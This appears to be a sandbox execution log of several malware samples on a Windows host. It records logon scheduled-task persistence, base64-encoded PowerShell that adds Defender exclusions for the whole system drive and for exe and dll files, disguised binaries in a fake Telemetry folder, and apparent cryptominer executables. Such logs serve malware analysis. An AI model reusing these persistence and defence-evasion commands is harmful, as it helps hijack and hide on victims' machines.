C:\Windows\explorer.exe vkhmukwpagbhgxxs0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0Gsol2ut25e0CiIvlYsuJiRf9cAIWsM5xNiv2CpmeSTZ4pQrFWNkEzZPEMfhraeOvsLhWY3jY+xzJ5IosXqgTdD3jVluCpzDi91PFz8FAJKOCtA6KcYwvQwF802MT/V1n/CnG34YKGCYZXIU4zRQW7lEbRoAvFGVxIf4tKfOP3Hf6S6LyTk2jeuhzzf2Zcs/0s5y+xhTpkhMOajNG7ary/m9cgvIxlkbwK4Z5kKm8TURafQOdOA6pYc+FSLPejIrpYVXzGzUYCucc1JnrFsvlMQn0ihvM4UYwSpRyIOiJG/Ku6F7NGOK/Ye1L7T6a3ZENVZhlQpPYYNgPEbnhEJs092J41opYOyT9/sUeOPXCLeCFm3ZCgbWVjF7QlJgl7+XRi1qxQqCVy15JYwYPI4ueAg==
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "wixbkzqmha"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap21678:190:7zEvent32374
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe"
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C WScript "C:\ProgramData\TywqfYfUij\r.vbs"
C:\Windows\SysWOW64\wscript.exe
WScript "C:\ProgramData\TywqfYfUij\r.vbs"
C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\TywqfYfUij\cfg"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap5033:378:7zEvent25235
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4247:762:7zEvent21565
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c taskkill /f /PID "4904"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /PID "4904"
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe
"C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe"
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe"
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe
"C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe"
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe
"C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe"
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe
"C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe"
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\309083e1-c7ce-4856-8974-714ff3572443" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe
"C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3348 -ip 3348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 1592
C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1896 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1932 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {da5417e8-2390-4983-8129-e25aedfb4270} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" gpu
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "wixbkzqmha"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
